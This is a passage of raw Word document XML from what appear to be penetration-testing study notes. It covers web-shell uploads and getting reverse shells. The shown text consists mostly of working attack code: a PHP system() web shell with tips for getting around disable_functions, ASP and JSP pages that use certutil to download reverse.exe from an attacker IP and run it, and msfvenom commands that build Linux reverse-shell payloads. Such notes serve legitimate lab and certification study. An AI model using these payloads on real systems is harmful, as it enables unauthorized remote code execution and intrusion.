    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F28">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F29">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('ruby reverse.rb', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F2A">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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Always make sure the interpreter (python3, perl, bash, etc.) exists on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can check phpinfo() for disable_functions that may block system(). Alternatives like exec(), shell_exec(), or popen() may work instead.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Linux/Unix, if the file is not executable, you may need to chmod +x it before running.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F30">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7kg721mpt8tp" w:id="129"/>
      <w:bookmarkEnd w:id="129"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What upload.php looks like for non-php languages</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is what it might look like if we used another language other than PHP</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ASP (Classic ASP) – Windows Server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F35">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload.asp – downloads reverse.exe:</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set oShell = CreateObject("WScript.Shell")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F39">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">oShell.Run "cmd /c certutil.exe -urlcache -split -f http://192.168.49.243/reverse.exe reverse.exe", 0, True</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F3A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%&gt;</w:t>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t xml:space="preserve">run.asp – executes reverse.exe:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F3D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F3E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set oShell = CreateObject("WScript.Shell")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F3F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">oShell.Run "cmd /c reverse.exe", 0, True</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F40">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JSP (Java Server Pages)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F45">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload.jsp:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F46">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F47">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F48">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        Runtime.getRuntime().exec("certutil.exe -urlcache -split -f http://192.168.49.243/reverse.exe reverse.exe");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F49">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    } catch(Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F4A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        out.println(e.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F4B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F4C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%&gt;</w:t>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run.jsp:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F50">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F51">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        Runtime.getRuntime().exec("reverse.exe");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F52">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    } catch(Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F53">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        out.println(e.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F54">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F55">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pirri5uxldvd" w:id="130"/>
      <w:bookmarkEnd w:id="130"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting a Reverse Shell</w:t>
      </w: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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">USE PENELOPE: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F5C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId322">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/brightio/penelope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F5D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get to Menu or exit FOR </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">penelope</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="532"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Linux, you can do</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fn + F12</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get to menu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="532"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Powershell, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fn + F12</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> doesn't work so do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + D</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rq0bjiuyhpny" w:id="131"/>
      <w:bookmarkEnd w:id="131"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MSFVENOM linux reverse shell:</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.elf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="580"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linux/x86/shell_reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f elf &gt; shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F66">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1478"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd/unix/reverse_bash </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST=192.168.45.169 LPORT=9090 -f </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">raw </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; reverse.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1478"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId323">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Fired</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Cool tool to see different available reverse shells:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="900"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId324">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/mthbernardes/rsg</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>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Some reverse shells and webshells are already included in Kali by default:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Located in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
